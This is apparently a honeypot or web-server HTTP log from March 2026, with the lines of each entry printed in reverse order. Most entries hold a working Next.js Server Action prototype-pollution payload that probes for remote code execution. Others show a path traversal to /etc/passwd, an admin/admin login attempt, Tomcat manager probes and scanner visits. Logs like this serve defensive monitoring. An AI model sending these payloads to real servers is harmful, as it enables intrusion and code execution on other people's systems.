[2026-03-06 02:32:19] === HTTP Request ===
===================
------WebKitFormBoundaryx1305598521404--
------WebKitFormBoundaryx1305598521404
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1305598521404
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 241307+true+5410529;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1305598521404
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_1305598521404
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1305598521404
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42662
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-06 02:32:19] === HTTP Request ===
===================
------WebKitFormBoundaryx936858078157--
------WebKitFormBoundaryx936858078157
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx936858078157
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 345521+true+2711436;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx936858078157
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_936858078157
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx936858078157
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42646
Path: /api
URL: /api
Method: POST
[2026-03-06 02:32:19] === HTTP Request ===
===================
------WebKitFormBoundaryx728754373907--
------WebKitFormBoundaryx728754373907
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx728754373907
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 146822+true+4963523;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx728754373907
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_728754373907
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx728754373907
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42630
Path: /_next
URL: /_next
Method: POST
[2026-03-06 02:32:19] === HTTP Request ===
[2026-03-06 02:32:19] Main page accessed - IP: 195.3.221.86:42620
===================
------WebKitFormBoundaryx640397965386--
------WebKitFormBoundaryx640397965386
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx640397965386
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 144751+true+4424135;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx640397965386
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx640397965386
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_640397965386
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42620
Path: /
URL: /
Method: POST
[2026-03-06 02:32:19] === HTTP Request ===
[2026-03-06 02:32:19] Main page accessed - IP: 195.3.221.86:42604
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42604
Path: /
URL: /
Method: GET
[2026-03-06 02:32:19] === HTTP Request ===
[2026-03-06 02:18:27] Main page accessed - IP: 147.185.132.12:59680
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru
RemoteAddr: 147.185.132.12:59680
Path: /
URL: /
Method: GET
[2026-03-06 02:18:27] === HTTP Request ===
[2026-03-06 02:13:21] Main page accessed - IP: 205.210.31.90:59684
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: defect.vulnberries.ru
RemoteAddr: 205.210.31.90:59684
Path: /
URL: /
Method: GET
[2026-03-06 02:13:21] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50024
Path: /debug.log
URL: /debug.log
Method: GET
[2026-03-06 02:01:46] === HTTP Request ===
[2026-03-06 01:38:37] Main page accessed - IP: 64.226.86.7:42112
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.226.86.7:42112
Path: /
URL: /
Method: GET
[2026-03-06 01:38:37] === HTTP Request ===
[2026-03-06 01:15:24] Main page accessed - IP: 172.30.0.12:45358
===================
X-Forwarded-For: 205.210.31.95
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45358
Path: /
URL: /
Method: GET
[2026-03-06 01:15:24] === HTTP Request ===
[2026-03-06 01:13:57] Main page accessed - IP: 147.185.132.180:60548
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 147.185.132.180:60548
Path: /
URL: /
Method: GET
[2026-03-06 01:13:57] === HTTP Request ===
[2026-03-06 00:45:12] Main page accessed - IP: 198.235.24.240:59700
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru
RemoteAddr: 198.235.24.240:59700
Path: /
URL: /
Method: GET
[2026-03-06 00:45:12] === HTTP Request ===
[2026-03-05 23:14:00] Main page accessed - IP: 147.185.132.106:64366
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.106:64366
Path: /
URL: /
Method: GET
[2026-03-05 23:14:00] === HTTP Request ===
[2026-03-05 20:54:44] Main page accessed - IP: 195.3.221.86:58416
===================
Accept: */*
User-Agent: Hello World/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:58416
Path: /
URL: /
Method: GET
[2026-03-05 20:54:44] === HTTP Request ===
===================
------WebKitFormBoundaryx56026944361--
------WebKitFormBoundaryx56026944361
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx56026944361
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 84069+true+666440;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx56026944361
Content-Length: 512
X-Nextjs-Html-Request-Id: ilovepoop_56026944361
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx56026944361
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:35574
Path: /api/route
URL: /api/route
Method: POST
[2026-03-05 19:13:49] === HTTP Request ===
===================
------WebKitFormBoundaryx808938265120--
------WebKitFormBoundaryx808938265120
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx808938265120
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 244837+true+3303987;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx808938265120
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx808938265120
X-Nextjs-Html-Request-Id: ilovepoop_808938265120
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:57626
Path: /app
URL: /app
Method: POST
[2026-03-05 19:13:48] === HTTP Request ===
===================
------WebKitFormBoundaryx1329872004165--
------WebKitFormBoundaryx1329872004165
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1329872004165
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 225214+true+5904926;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1329872004165
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1329872004165
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1329872004165
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:57500
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-05 19:13:47] === HTTP Request ===
===================
------WebKitFormBoundaryx23014529301--
------WebKitFormBoundaryx23014529301
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx23014529301
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 47002+true+489650;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx23014529301
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx23014529301
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_23014529301
Content-Length: 512
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:57470
Path: /api
URL: /api
Method: POST
[2026-03-05 19:13:39] === HTTP Request ===
===================
------WebKitFormBoundaryx823311083904--
------WebKitFormBoundaryx823311083904
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx823311083904
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 228613+true+3601331;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx823311083904
Accept-Encoding: gzip, deflate
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_823311083904
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx823311083904
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:57468
Path: /_next
URL: /_next
Method: POST
[2026-03-05 19:13:38] === HTTP Request ===
[2026-03-05 19:13:38] Main page accessed - IP: 195.3.221.86:39770
===================
------WebKitFormBoundaryx717779551507--
------WebKitFormBoundaryx717779551507
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx717779551507
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 261923+true+2740422;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx717779551507
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_717779551507
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx717779551507
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:39770
Path: /
URL: /
Method: POST
[2026-03-05 19:13:38] === HTTP Request ===
[2026-03-05 19:13:37] Main page accessed - IP: 195.3.221.86:39670
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:39670
Path: /
URL: /
Method: GET
[2026-03-05 19:13:37] === HTTP Request ===
===================
Body: user=admin&pass=admin
Accept-Encoding: gzip
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/plain, */*
Content-Length: 21
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/135.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 104.244.79.113:50180
Path: /app/api/login
URL: /app/api/login
Method: POST
[2026-03-05 18:58:38] === HTTP Request ===
===================
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.209:4717
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-05 17:03:27] === HTTP Request ===
[2026-03-05 17:03:21] Main page accessed - IP: 64.62.156.210:47323
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.210:47323
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-05 17:03:21] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.204:27527
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-05 17:02:38] === HTTP Request ===
[2026-03-05 17:02:05] Main page accessed - IP: 64.62.156.202:61002
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.202:61002
Path: /
URL: /
Method: GET
[2026-03-05 17:02:05] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.62:7946
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-05 13:46:36] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 167.94.138.62:60438
Path: *
URL: *
Method: PRI
[2026-03-05 13:46:30] === HTTP Request ===
[2026-03-05 13:46:26] Main page accessed - IP: 167.94.138.62:60426
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.62:60426
Path: /
URL: /
Method: GET
[2026-03-05 13:46:26] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:47624
Path: /jars
URL: /jars
Method: GET
[2026-03-05 13:40:35] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:60870
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-05 13:28:53] === HTTP Request ===
===================
------WebKitFormBoundaryx455634351279--
------WebKitFormBoundaryx455634351279
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx455634351279
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 69203+true+6584026;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx455634351279
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
X-Nextjs-Html-Request-Id: ilovepoop_455634351279
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx455634351279
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Request-Id: poop1234
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.11:49702
Path: /api/route
URL: /api/route
Method: POST
[2026-03-05 12:38:06] === HTTP Request ===
===================
------WebKitFormBoundaryx117020277478--
------WebKitFormBoundaryx117020277478
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx117020277478
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 187623+true+623699;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx117020277478
X-Nextjs-Html-Request-Id: ilovepoop_117020277478
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx117020277478
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.11:49700
Path: /app
URL: /app
Method: POST
[2026-03-05 12:38:06] === HTTP Request ===
===================
------WebKitFormBoundaryx395284557526--
------WebKitFormBoundaryx395284557526
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx395284557526
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 117975+true+3350579;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx395284557526
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_395284557526
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx395284557526
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.11:49690
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-05 12:38:06] === HTTP Request ===
===================
------WebKitFormBoundaryx988997635099--
------WebKitFormBoundaryx988997635099
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx988997635099
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 150342+true+6578319;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx988997635099
X-Nextjs-Html-Request-Id: ilovepoop_988997635099
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx988997635099
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.11:49688
Path: /api
URL: /api
Method: POST
[2026-03-05 12:38:05] === HTTP Request ===
===================
------WebKitFormBoundaryx1036752312658--
------WebKitFormBoundaryx1036752312658
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1036752312658
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 184169+true+5629353;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1036752312658
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1036752312658
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1036752312658
X-Nextjs-Request-Id: poop1234
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.11:60124
Path: /_next
URL: /_next
Method: POST
[2026-03-05 12:38:05] === HTTP Request ===
[2026-03-05 12:38:04] Main page accessed - IP: 45.194.92.11:60116
===================
------WebKitFormBoundaryx907108037047--
------WebKitFormBoundaryx907108037047
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx907108037047
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 220078+true+4121757;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx907108037047
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_907108037047
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx907108037047
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.194.92.11:60116
Path: /
URL: /
Method: POST
[2026-03-05 12:38:04] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 40.124.170.45:53624
Path: /manager/text/list
URL: /manager/text/list
Method: GET
[2026-03-05 11:55:29] === HTTP Request ===
===================
Accept-Encoding: gzip
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Pragma: no-cache
Accept-Language: en;q=0.9
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Cache-Control: no-cache
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 123.160.223.74:29777
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-05 11:22:47] === HTTP Request ===
[2026-03-05 11:22:45] Login page accessed - IP: 47.254.76.66:40194
===================
Referer: http://bloodthirstypiggy.ru:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept-Language: en
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 47.254.76.66:40194
Path: /login
URL: /login
Method: GET
[2026-03-05 11:22:45] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Language: en
Accept-Encoding: gzip
Referer: http://bloodthirstypiggy.ru:8081/
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 47.254.76.66:40180
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-05 11:22:42] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Language: en
Accept-Encoding: gzip
Referer: http://bloodthirstypiggy.ru:8081/
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 47.254.76.66:40176
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-05 11:22:42] === HTTP Request ===
[2026-03-05 11:22:38] Main page accessed - IP: 47.254.76.66:25850
===================
Upgrade-Insecure-Requests: 1
Accept-Language: en
Accept-Encoding: gzip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Headers:
